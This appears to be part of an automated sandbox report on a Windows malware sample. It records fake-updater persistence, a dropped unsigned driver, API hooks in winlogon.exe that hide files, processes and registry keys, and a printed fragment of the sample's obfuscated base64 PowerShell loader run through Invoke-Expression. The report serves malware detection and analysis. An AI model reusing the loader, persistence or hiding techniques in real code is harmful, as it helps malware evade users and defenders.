                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                      Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                      Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000036.00000000.2489829053.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000036.00000000.2489829053.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 0000001C.00000003.2442351012.0000015366BF0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ~1.PDB @ source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, MainModuleUI.cs.Net Code: Prompt
                      Found suspicious powershell code related to unpacking or dynamic code loading
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeAnti Malware Scan Interface: FromBase64String("$pwshcode"))Invoke-Expression $pwshdecoded$Decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAIWQMW/CMBCF/8opQqKVmlhNDAMIVRXQrYCUIQtLEp8TR45N7YsM/76GoWqnTnfSe+/03XsXIv28nBxKd
                      Source: C:\Windows\System32\dialer.exeCode function: 47_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,47_2_00000001408460F0
                      Source: system64x.exe.1.drStatic PE information: section name: .00cfg
                      Source: updater.exe.3.drStatic PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeCode function: 1_2_00007FF8489BD2A5 pushad ; iretd 1_2_00007FF8489BD2A6
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeCode function: 1_2_00007FF848AD7113 push eax; iretd 1_2_00007FF848AD7141
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeCode function: 1_2_00007FF848AD7143 push eax; iretd 1_2_00007FF848AD7141
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeCode function: 1_2_00007FF848AD00BD pushad ; iretd 1_2_00007FF848AD00C1
                      Source: C:\Windows\SysWOW64\system64x.exeCode function: 3_2_00007FF762441394 push qword ptr [00007FF76244B004h]; ret 3_2_00007FF762441403
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E85896ACDD push rcx; retf 003Fh22_2_000001E85896ACDE
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E85899C6DD push rcx; retf 003Fh22_2_000001E85899C6DE
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589CACDD push rcx; retf 003Fh22_2_000001E8589CACDE
                      Source: C:\ProgramData\Google\Chrome\updater.exeCode function: 28_2_00007FF72AF21394 push qword ptr [00007FF72AF2B004h]; ret 28_2_00007FF72AF21403
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140ADFDACDD push rcx; retf 003Fh31_2_00000140ADFDACDE
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE87C6DD push rcx; retf 003Fh31_2_00000140AE87C6DE
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5AACDD push rcx; retf 003Fh32_2_00000195DD5AACDE
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5DC6DD push rcx; retf 003Fh32_2_00000195DD5DC6DE
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA7ACDD push rcx; retf 003Fh33_2_000001160CA7ACDE
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CAAC6DD push rcx; retf 003Fh33_2_000001160CAAC6DE
                      Source: C:\Windows\System32\dialer.exeCode function: 45_2_0000000140001394 push qword ptr [0000000140009004h]; ret 45_2_0000000140001403
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E108ACDD push rcx; retf 003Fh48_2_00000257E108ACDE
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10BC6DD push rcx; retf 003Fh48_2_00000257E10BC6DE
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C1EACDD push rcx; retf 003Fh49_2_000001F28C1EACDE
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C94C6DD push rcx; retf 003Fh49_2_000001F28C94C6DE
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA97FEACDD push rcx; retf 003Fh50_2_000001CA97FEACDE
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA9855C6DD push rcx; retf 003Fh50_2_000001CA9855C6DE
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D2652FACDD push rcx; retf 003Fh51_2_000001D2652FACDE
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D26532C6DD push rcx; retf 003Fh51_2_000001D26532C6DE
                      Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000254A27EC6DD push rcx; retf 003Fh52_2_00000254A27EC6DE
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E4ACDD push rcx; retf 003Fh53_2_0000028708E4ACDE
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E7C6DD push rcx; retf 003Fh53_2_0000028708E7C6DE
                      Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000024B87DEC6DD push rcx; retf 003Fh54_2_0000024B87DEC6DE
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FB3DACDD push rcx; retf 003Fh55_2_00000205FB3DACDE
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FD41C6DD push rcx; retf 003Fh55_2_00000205FD41C6DE
                      Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001A2056BC6DD push rcx; retf 003Fh56_2_000001A2056BC6DE

                      Persistence and Installation Behavior

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeExecutable created and started: C:\Windows\SysWOW64\system64x.exeJump to behavior
                      Sample is not signed and drops a device driver
                      Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\voeeoiqrjnla.sys
                      Source: C:\Windows\SysWOW64\system64x.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile created: C:\Windows\SysWOW64\system64x.exeJump to dropped file
                      Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\voeeoiqrjnla.sysJump to dropped file
                      Source: C:\Windows\SysWOW64\system64x.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile created: C:\Windows\SysWOW64\system64x.exeJump to dropped file
                      Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\voeeoiqrjnla.sysJump to dropped file
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hooks files or directories query functions (used to hide files and directories)
                      Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                      Hooks processes query functions (used to hide processes)
                      Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                      Hooks registry keys query functions (used to hide registry keys)
                      Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                      Loading BitLocker PowerShell Module
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Modifies the prolog of user mode functions (user mode inline hooks)
                      Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
